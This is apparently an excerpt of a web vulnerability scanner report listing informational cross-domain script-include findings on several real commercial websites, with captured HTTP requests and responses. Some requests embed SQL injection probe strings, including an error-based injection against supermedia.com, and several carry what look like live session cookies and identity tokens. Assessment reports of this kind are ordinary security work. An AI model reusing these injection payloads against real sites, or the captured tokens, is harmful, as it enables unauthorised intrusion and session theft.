Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1300987757.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1364029523-1300987777508; __qseg=Q_D|Q_T|Q_2687|Q_2685|Q_2402|Q_1910|Q_1908|Q_1905|Q_1592|Q_683|Q_682|Q_680|Q_679|Q_678|Q_677|Q_676|Q_666|Q_665|Q_660|Q_657; huffpost_adssale=y; s_pers=%20s_getnr%3D1301171811856-Repeat%7C1364243811856%3B%20s_nrgvo%3DRepeat%7C1364243811860%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; huffpo_type_views=%7B%222%22%3A1%7D; __utma=265287574.492257335.1300987757.1300987757.1301171812.2; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.6.10.1301171812

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=220
Date: Sat, 26 Mar 2011 20:36:16 GMT
Content-Length: 966
Connection: close

<html>
<head>
<title>Huffit Tracker</title>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=hp_config.js%2Chp_track.js&amp;v44491"></script>
</head>
<body>
   <!-- Con
...[SNIP]...
21.45. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:15:57 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<td width="135" align="center" valign="top"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.insideup.com&size=L&use_flash=NO&use_transparent=NO...=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
21.46. http://www.microsoft.com/global/security/microsites/msrc/PublishingImages/spacer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsoft.com
Path:   /global/security/microsites/msrc/PublishingImages/spacer.gif

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /global/security/microsites/msrc/PublishingImages/spacer.gif HTTP/1.1
Host: www.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/security/msrc/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; MS_SRDR=homepageOptInState=forceOut; mscomhp=stickyTabIndex%3A0%2Cpath%3A/en/us%7CstickyTabIndex%3A0%2Cpath%3A/en/us; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; WebLanguagePreference=en-us; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi^0001A@E0J02hA@E0J; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301093020097:ss=1301092848759; WT_NVR=0=/:1=technet|security|casestudies|en-us:2=technet/security|licensing/how-to-buy|en/us|business/bposoffer|downloads/en|web/websitespark|security/msrc:3=technet/security/advisory|sqlserver/en/us

Response

HTTP/1.1 404 Page not available
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 791790241700000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:42:54 GMT
Content-Length: 107535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en"><head><base href
...[SNIP]...
<div class="smp_vertAd" style="width:160px;"><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
21.47. http://www.microsoft.com/global/security/msrc/RenderingAssets/scripts/jquery-1.4.1.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsoft.com
Path:   /global/security/msrc/RenderingAssets/scripts/jquery-1.4.1.min.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /global/security/msrc/RenderingAssets/scripts/jquery-1.4.1.min.js HTTP/1.1
Host: www.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/security/msrc/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; MS_SRDR=homepageOptInState=forceOut; mscomhp=stickyTabIndex%3A0%2Cpath%3A/en/us%7CstickyTabIndex%3A0%2Cpath%3A/en/us; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; WebLanguagePreference=en-us; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; WT_NVR=0=/:1=technet|security|casestudies|en-us:2=technet/security|licensing/how-to-buy|en/us|business/bposoffer|downloads/en|web/websitespark:3=technet/security/advisory|sqlserver/en/us; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301093006535:ss=1301092848759; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi^0001A@E0J02hA@E0J; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Page not available
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 279741843100000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:43:59 GMT
Content-Length: 107569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en"><head><base href
...[SNIP]...
<div class="smp_vertAd" style="width:160px;"><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
21.48. http://www.smartertools.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smartertools.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.smartertools.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=134836083.1670938407.1300551915.1300551915.1300554519.2

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:57:48 GMT
Content-Length: 24112


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="ctl00_
...[SNIP]...
</script>


<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
21.49. http://www.smartertools.com/smartermail/mail-server-download.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smartertools.com
Path:   /smartermail/mail-server-download.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /smartermail/mail-server-download.aspx HTTP/1.1
Host: www.smartertools.com
Proxy-Connection: keep-alive
Referer: http://www.smartertools.com/smartermail/mail-server-software.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=nts3gc5tu1hyp1kyuo3cjh33; __utma=134836083.1670938407.1300551915.1300554519.1301158717.3; __utmc=134836083; __utmb=134836083.2.10.1301158717

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:58:02 GMT
Content-Length: 22186


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="ctl00_
...[SNIP]...
</script>


<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
21.50. http://www.smartertools.com/smartermail/mail-server-software.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smartertools.com
Path:   /smartermail/mail-server-software.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /smartermail/mail-server-software.aspx HTTP/1.1
Host: www.smartertools.com
Proxy-Connection: keep-alive
Referer: http://www.smartertools.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=nts3gc5tu1hyp1kyuo3cjh33; __utma=134836083.1670938407.1300551915.1300554519.1301158717.3; __utmc=134836083; __utmb=134836083.1.10.1301158717

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:57:58 GMT
Content-Length: 15066


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="ctl00_
...[SNIP]...
</script>


<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
21.51. http://www.soundingsonline.com/archives/'+NSFTW+'  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /archives/'+NSFTW+'

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /archives/'+NSFTW+'?ordering=&searchphrase=all HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 19:13:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...
21.52. https://www.supermedia.com/help  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/spportal/spportalFlow.do?_flowId=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4487424B77C0217B5BAEF5DAE41C714C.app4-a2; trafficSource=default; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1301080493266-271579#1301083834|check#true#1301082034; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:38:52 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 24957


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Help | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...
21.53. https://www.supermedia.com/help/direct-mail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/direct-mail

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/direct-mail HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/help
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4487424B77C0217B5BAEF5DAE41C714C.app4-a2; trafficSource=default; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1301080493266-271579#1301083842|check#true#1301082042; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:38:56 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 25146


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Ddirect Mail</title>


<link type="text/css" rel="st
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...
21.54. https://www.supermedia.com/help/domains-email  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/domains-email

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/domains-email HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/help/direct-mail
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4487424B77C0217B5BAEF5DAE41C714C.app4-a2; trafficSource=default; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1301080493266-271579#1301083845|check#true#1301082045; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:38:58 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 40501


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Domains and Email Help | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...
21.55. https://www.supermedia.com/help/local-search-marketing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/local-search-marketing

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/local-search-marketing HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/help
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4487424B77C0217B5BAEF5DAE41C714C.app4-a2; trafficSource=default; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=check#true#1301087177|session#1301087116927-461135#1301088977; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 21:08:19 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 30206


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Local Search Marketing Help | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...
21.56. https://www.supermedia.com/help/web-site-design  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/web-site-design

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/web-site-design HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/help/domains-email
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4487424B77C0217B5BAEF5DAE41C714C.app4-a2; trafficSource=default; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1301080493266-271579#1301083848|check#true#1301082048; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:39:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 29836


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Web Site Design Help | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...
21.57. https://www.territoryahead.com/text/cm/eluminate.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /text/cm/eluminate.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /text/cm/eluminate.js HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
Referer: https://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=-1+OR+17-7%3d10&path=1%2C2%2C195%2C241
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
